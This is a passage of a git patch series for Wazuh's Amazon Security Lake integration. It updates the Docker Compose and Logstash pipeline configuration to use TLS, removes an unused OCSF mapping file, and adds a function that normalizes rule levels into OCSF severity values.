@@ -20,15 +21,10 @@ input {
 }
 
 output {
-
-	stdout { codec => rubydebug }
-
-	pipe
-	{
-		id => "securityLake"
-		message_format => "%{_source}"
-		ttl => "10"
-		command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d"
-	}
-
+    pipe {
+        id => "securityLake"
+        message_format => "%{_source}"
+        ttl => "10"
+        command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d"
+    }
 }
diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
index d44598029eb0f..65a8905bcd987 100644
--- a/integrations/docker/amazon-security-lake.yml
+++ b/integrations/docker/amazon-security-lake.yml
@@ -1,4 +1,4 @@
-version: '3'
+version: "3.8"
 name: "amazon-security-lake"
 services:
   events-generator:
@@ -7,22 +7,35 @@ services:
       context: ../tools/events-generator
     container_name: events-generator
     depends_on:
-      - wazuh.indexer
-    networks:
-      - net
-    # TODO add healthcheck to indexer's service to avoid sending requests before API is ready.
-    command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer"
+      wazuh.indexer:
+        condition: service_healthy
+    command: bash -c "python run.py -a wazuh.indexer"
 
   wazuh.indexer:
-    image: opensearchproject/opensearch:latest
+    image: opensearchproject/opensearch:2.11.1
     container_name: wazuh.indexer
+    depends_on:
+      wazuh-certs-generator:
+        condition: service_completed_successfully
     hostname: wazuh.indexer
+    ports:
+      - 9200:9200
     environment:
       # - cluster.name=opensearch-cluster
       - node.name=wazuh.indexer
       - discovery.type=single-node
       # - cluster.initial_cluster_manager_nodes=opensearch-node
       - bootstrap.memory_lock=true
+      - "DISABLE_INSTALL_DEMO_CONFIG=true"
+      - plugins.security.ssl.http.enabled=true
+      - plugins.security.allow_default_init_securityindex=true
+      - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem
+      - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem
+      - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US"
       - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m"
     ulimits:
       memlock:
@@ -31,14 +44,21 @@ services:
       nofile:
         soft: 65536
         hard: 65536
+    healthcheck:
+      test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster
+      start_period: 10s
+      start_interval: 3s
     volumes:
       - data:/usr/share/opensearch/data
-    networks:
-      - net
+      - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem
+      - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem
+      - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem
 
   wazuh.dashboard:
-    image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes
+    image: opensearchproject/opensearch-dashboards:2.11.1
     container_name: wazuh.dashboard
+    depends_on:
+      - wazuh.indexer
     hostname: wazuh.dashboard
     ports:
       - 5601:5601 # Map host port 5601 to container port 5601
@@ -46,14 +66,14 @@ services:
       - "5601" # Expose port 5601 for web access to OpenSearch Dashboards
     environment:
       OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
-    networks:
-      - net
-  
+
   wazuh.integration.security.lake:
     image: wazuh/indexer-security-lake-integration
     build:
       context: ../amazon-security-lake
     container_name: wazuh.integration.security.lake
+    depends_on:
+      - wazuh.indexer
     hostname: wazuh.integration.security.lake
     environment:
       LOG_LEVEL: trace
@@ -68,12 +88,9 @@ services:
       - "9600:9600"
     volumes:
       - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline
-    depends_on:
-      - wazuh.indexer
-    networks:
-      - net
-    command: tail -f /dev/null
-    # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash
+      - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem
+    # command: tail -f /dev/null
+    command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic
 
   s3.ninja:
     image: scireum/s3-ninja:latest
@@ -83,12 +100,16 @@ services:
       - "9444:9000"
     volumes:
       - s3-data:/home/sirius/data
-    networks:
-      - net
+
+  wazuh-certs-generator:
+    image: wazuh/wazuh-certs-generator:0.0.1
+    hostname: wazuh-certs-generator
+    container_name: wazuh-certs-generator
+    entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*"
+    volumes:
+      - ./certs/:/certificates/
+      - ./config/certs.yml:/config/certs.yml
 
 volumes:
   data:
   s3-data:
-
-networks:
-  net:
\ No newline at end of file
diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml
new file mode 100644
index 0000000000000..c3e017be10eea
--- /dev/null
+++ b/integrations/docker/config/certs.yml
@@ -0,0 +1,16 @@
+nodes:
+  # Wazuh indexer server nodes
+  indexer:
+    - name: wazuh.indexer
+      ip: wazuh.indexer
+
+  # Wazuh server nodes
+  # Use node_type only with more than one Wazuh manager
+  server:
+    - name: wazuh.manager
+      ip: wazuh.manager
+
+  # Wazuh dashboard node
+  dashboard:
+    - name: wazuh.dashboard
+      ip: wazuh.dashboard

From c111dee7affbc6f7092d075b71a7c38560e43a38 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 29 Feb 2024 17:17:45 +0100
Subject: [PATCH 32/34] Fix Logstash pipelines

---
 .../logstash/pipeline/indexer-to-file.conf             |  6 ++++--
 .../logstash/pipeline/indexer-to-integrator.conf       |  2 +-
 .../logstash/pipeline/indexer-to-s3.conf               | 10 +++++-----
 3 files changed, 10 insertions(+), 8 deletions(-)

diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
index e3fa60a785372..4d5a47169e197 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -1,9 +1,10 @@
 input {
    opensearch {
-      hosts =>  ["opensearch-node:9200"]
+      hosts =>  ["wazuh.indexer:9200"]
       user  =>  "${INDEXER_USERNAME}"
       password  =>  "${INDEXER_PASSWORD}"
-      ssl => false
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
       index =>  "wazuh-alerts-4.x-*"
       query =>  '{
             "query": {
@@ -19,6 +20,7 @@ input {
    }
 }
 
+
 output {
    file {
       path => "/usr/share/logstash/pipeline/indexer-to-file.json"
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
index 2f70beebbfaaa..81a4bdad5883a 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
@@ -25,6 +25,6 @@ output {
         id => "securityLake"
         message_format => "%{_source}"
         ttl => "10"
-        command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d"
+        command => "/usr/bin/env python3 /usr/local/bin/run.py -d"
     }
 }
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
index 6ca2ca0d5a08f..22d44b9d0d3f5 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
@@ -1,11 +1,11 @@
 input {
    opensearch {
-      hosts =>  ["localhost:9200"]
-      user  =>  "${WAZUH_INDEXER_USERNAME}"
-      password  =>  "${WAZUH_INDEXER_PASSWORD}"
-      index =>  "wazuh-alerts-4.x-*"
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
       ssl => true
-      ca_file => "/etc/logstash/wi-certs/root-ca.pem"
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
       query =>  '{
             "query": {
                "range": {

From b84ff0bfcf627f6885c5d425a67780f2e167c0e0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 29 Feb 2024 18:17:57 +0100
Subject: [PATCH 33/34] Remove unused file

---
 integrations/ocsf-mapping.json | 86 ----------------------------------
 1 file changed, 86 deletions(-)
 delete mode 100644 integrations/ocsf-mapping.json

diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json
deleted file mode 100644
index c1238dac285df..0000000000000
--- a/integrations/ocsf-mapping.json
+++ /dev/null
@@ -1,86 +0,0 @@
-{	
-	"1.0.0":
-	{
-		"constants":
-		{
-			"activity_id" : 1,
-			"analytic.type" : "Rule",
-			"analytic.type_id" : 1,
-			"attacks.version" : "v13.1",
-			"category_name" : "Findings",
-			"category_uid" : 2,
-			"class_name" : "Security Finding",
-			"class_uid" : 2001,
-			"metadata.log_name" : "Security events",
-			"metadata.log_provider" : "Wazuh",
-			"metadata.product.lang" : "en",
-			"metadata.product.name" : "Wazuh",
-			"metadata.product.vendor_name" : "Wazuh, Inc.",
-			"metadata.product.version" : "4.9.0",
-			"status_id" : 99,
-			"type_uid" : 200101
-		},
-		"mappings":
-		{
-			"analytic.category" : "rule.groups",
-			"analytic.name" : "decoder.name",
-			"analytic.uid" : "rule.id",
-			"attacks.tactics" : "rule.mitre.tactic",
-			"attacks.technique" : "rule.mitre.technique",
-			"count" : "rule.firedtimes",
-			"data_sources" : ["_index", "location", "manager.name"], 
-			"finding.title" : "rule.description",
-			"finding.types" : "input.type",
-			"finding.uid" : "id",
-			"message" : "rule.description",
-			"nist" : "rule.nist_800_53",
-			"raw_data" : "full_log",
-			"resources.name" : "agent.name",
-			"resources.uid" : "agent.id",
-			"risk_score" : "rule.level",
-			"severity_id" : "rule.level",
-			"time" : "timestamp"
-		}
-	},
-	"1.1.0":
-	{
-		"constants":
-		{
-			"activity_id" : 1,
-			"category_name" : "Findings",
-			"category_uid" : 2,
-			"class_name" : "Security Finding",
-			"class_uid" : 2001,
-			"finding_info.analytic.type" : "Rule",
-			"finding_info.analytic.type_id" : 1,
-			"finding_info.attacks.version" : "v13.1",
-			"metadata.log_name" : "Security events",
-			"metadata.log_provider" : "Wazuh",
-			"metadata.product.lang" : "en",
-			"metadata.product.name" : "Wazuh",
-			"metadata.product.vendor_name" : "Wazuh, Inc.",
-			"metadata.product.version" : "4.9.0",
-			"status_id" : 99,
-			"type_uid" : 200101
-		},
-		"mappings":
-		{
-			"count" : "rule.firedtimes",
-			"finding_info.analytic.category" : "rule.groups",
-			"finding_info.analytic.name" : "decoder.name",
-			"finding_info.analytic.uid" : "rule.id",
-			"finding_info.attacks.tactic" : "rule.mitre.tactic",
-			"finding_info.attacks.technique" : "rule.mitre.technique",
-			"finding_info.title" : "rule.description",
-			"finding_info.types" : "input.type",
-			"finding_info.uid" : "id",
-			"message" : "rule.description",
-			"raw_data" : "full_log",
-			"resources.name" : "agent.name",
-			"resources.uid" : "agent.id",
-			"risk_score" : "rule.level",
-			"severity_id" : "rule.level",
-			"time" : "timestamp"
-		}
-	}
-}

From 1210c077a2cb03985633d6bc8b698dc35cdcd958 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Fri, 1 Mar 2024 17:15:28 +0100
Subject: [PATCH 34/34] Implement OCSF severity normalize function

---
 integrations/README.md                        |  7 +++-
 .../amazon-security-lake/parquet/test.py      |  1 -
 .../transform/converter.py                    | 42 +++++++------------
 3 files changed, 20 insertions(+), 30 deletions(-)

diff --git a/integrations/README.md b/integrations/README.md
index 5e69b4f673d6c..ae3253b8547b8 100644
--- a/integrations/README.md
+++ b/integrations/README.md
@@ -5,7 +5,12 @@ The goal is to transport Wazuh's analysis to the platform that suits your needs.
 
 ### Amazon Security Lake
 
-TBD
+Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, 
+on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, 
+you can get a more complete understanding of your security data across your entire organization. You can 
+also improve the protection of your workloads, applications, and data. Security Lake has adopted the 
+Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes 
+and combines security data from AWS and a broad range of enterprise security data sources.
 
 ##### Usage
 
diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py
index 2022111b25e33..318da6ebe4740 100644
--- a/integrations/amazon-security-lake/parquet/test.py
+++ b/integrations/amazon-security-lake/parquet/test.py
@@ -4,7 +4,6 @@
 from parquet import Parquet
 import json
 
-# converted_event = {}
 with open("wazuh-event.ocsf.json", "r") as fd:
     events = [json.load(fd)]
     table = pa.Table.from_pylist(events)
diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py
index 983ba9572841f..90f8eeef27bac 100644
--- a/integrations/amazon-security-lake/transform/converter.py
+++ b/integrations/amazon-security-lake/transform/converter.py
@@ -8,8 +8,20 @@ def normalize(level: int) -> int:
     """
     Normalizes rule level into the 0-6 range, required by OCSF.
     """
-    # TODO normalization
-    return level
+    if level >= 15:     # (5) Critical
+        severity = 5
+    elif level >= 11:   # (4) High
+        severity = 4
+    elif level >= 8:    # (3) Medium
+        severity = 3
+    elif level >= 4:    # (2) Low
+        severity = 2
+    elif level >= 0:    # (1) Informational
+        severity = 1
+    else:
+        severity = 0    # (0) Unknown
+
+    return severity
 
 
 def join(iterable, separator=","):
@@ -84,29 +96,3 @@ def from_json(event: dict) -> models.wazuh.Event:
         return models.wazuh.Event.model_validate_json(json.dumps(event))
     except pydantic.ValidationError as e:
         print(e)
-
-
-def _test():
-    ocsf_event = {}
-    with open("wazuh-event.sample.json", "r") as fd:
-        # Load from file descriptor
-        event = json.load(fd)
-        try:
-            # Create instance of Event from JSON input (must be string, bytes or bytearray)
-            event = models.wazuh.Event.model_validate_json(json.dumps(event))
-            print(event)
-            ocsf_event = to_detection_finding(event)
-
-        except KeyError as e:
-            raise (e)
-        except pydantic.ValidationError as e:
-            print(e)
-
-        if ocsf_event:
-            with open("wazuh-event.ocsf.json", "w") as fd:
-                json.dump(ocsf_event.model_dump(), fd)
-                print(ocsf_event.model_dump())
-
-
-if __name__ == '__main__':
-    _test()